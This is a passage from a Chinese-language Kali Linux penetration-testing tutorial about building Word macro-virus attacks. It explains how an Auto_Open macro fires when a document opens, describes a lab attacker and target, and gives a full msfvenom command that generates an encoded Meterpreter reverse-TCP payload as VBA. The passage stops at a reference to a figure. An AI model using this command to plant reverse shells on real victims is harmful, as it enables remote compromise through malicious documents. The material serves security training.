Kali渗透测试:使用宏病毒进行渗透攻击
VBA是基于Visual Basic发展而来的,与Visual Basic具有相似的语言结构。使用VBA可以完成很多事情,基于Excel、Word的VBA小程序不计其数。宏病毒在Word中引入宏之后出现的。目前Office 是较为流行的编辑软件,并且跨越了多种操作系统,宏病毒利用这一点得到了大范围的传播。
构造一个包含宏病毒的Word文件也并不复杂,只要编写一个Auto_Open函数,就可自动引发病毒。 在Word打开这个文件时, 宏病毒会执行, 然后感染其他文件或直接删除其他文件等。Word宏和其他样式存储在模版DOT文件中, 因此总是把Word文件转成模版,再将其存储为宏。
实 验 环 境
攻击机:Linux kali 5.10.0 IP: 192.168.68.125
靶机:IE11-Win81
操 作 步 骤
1. 使用msfvenom生成VBA被控端
在Kali Linux中使用msfvenom命令生成一个VBA类型的被控端,输入如下命令:
┌──(root??kali)-[~]
└─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.68.125 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe
该被控端可以分为两个部分。第一个部分是包括Auto_Open在内的几个函数,如下图所示: